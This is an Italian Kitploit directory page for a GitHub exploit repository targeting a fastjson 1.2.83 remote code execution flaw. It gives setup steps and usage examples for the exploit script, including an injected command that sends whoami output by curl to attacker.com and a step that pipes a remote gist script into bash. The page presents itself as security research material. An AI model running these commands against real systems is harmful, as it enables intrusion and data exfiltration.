Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-16723 — CVE-2026-16723 | Kitploit
Strumenti/GitHubGitHub/horkimhab/cve-2026-16723
Apprendimento e Formazione
GitHubhorkimhab/cve-2026-16723

CVE-2026-16723

CVE-2026-16723

Vedi RepositorySito web
1125 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-16723

Dona

Supporta la manutenzione di questo progetto con PayPal o scansionando il codice QR qui sotto.

paypal

Codice QR per la donazione

⚡ Utilizzo Semplice

Utilizza questo progetto solo in ambienti sicuri e autorizzati, come:

  • Macchine virtuali locali
  • Container Docker
  • Configurazioni di laboratorio isolate
  • Ambienti di penetration testing autorizzati

Configurazione di esempio:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723

# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Utilizzo di esempio:

root@kitploit:~
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse

# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"

# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000

# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure

# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080

# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50

# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet

Nota:

  • se cloni da un altro progetto, devi eseguire curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y per rimuovere la directory .git annidata
  • es: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crediti o Riferimenti

  • https://fearsoff.org/research/fastjson-1-2-83-rce
  • https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
  • https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch

📚 Repository Educativo di Ricerca sulla Sicurezza

Un repository per apprendere, testare e ricercare concetti di cybersecurity in ambienti controllati.


⚠️ Disclaimer di Sicurezza e Legale

Scopo

Questo repository è solo per ricerca sulla sicurezza educativa e autorizzata.

È progettato per aiutare gli utenti a conoscere:

  • Le vulnerabilità di sicurezza
  • I concetti di sandbox e isolamento
  • Le pratiche di codifica sicura e difensive

Uso Esclusivamente Autorizzato

Utilizza questo repository solo in ambienti in cui hai l'autorizzazione, come:

  • Laboratori personali o macchine virtuali
  • Ambienti Docker o isolati
  • Penetration testing autorizzato
  • Formazione sulla cybersecurity o ricerca accademica

L'uso non autorizzato o illegale è severamente vietato.


Nessuna Responsabilità

L'autore e i collaboratori non sono responsabili per eventuali danni, usi impropri, problemi legali o perdite causati da questo progetto.

Utilizzando questo repository, accetti che:

  • Sei responsabile delle tue azioni
  • Lo utilizzerai in modo legale ed etico
  • Il progetto è fornito senza garanzia

Uso Etico

Questo progetto è pensato per:

  • Ricerca sulla sicurezza difensiva
  • Educazione alla cybersecurity
  • Consapevolezza delle vulnerabilità
  • Ricerca su sistemi e software sicuri

Si prega di seguire le pratiche di divulgazione responsabile e di rispettare tutte le leggi applicabili.


Contatti

Per divulgazione responsabile o collaborazione, contatta il manutentore del repository tramite GitHub.

Scarica lo strumento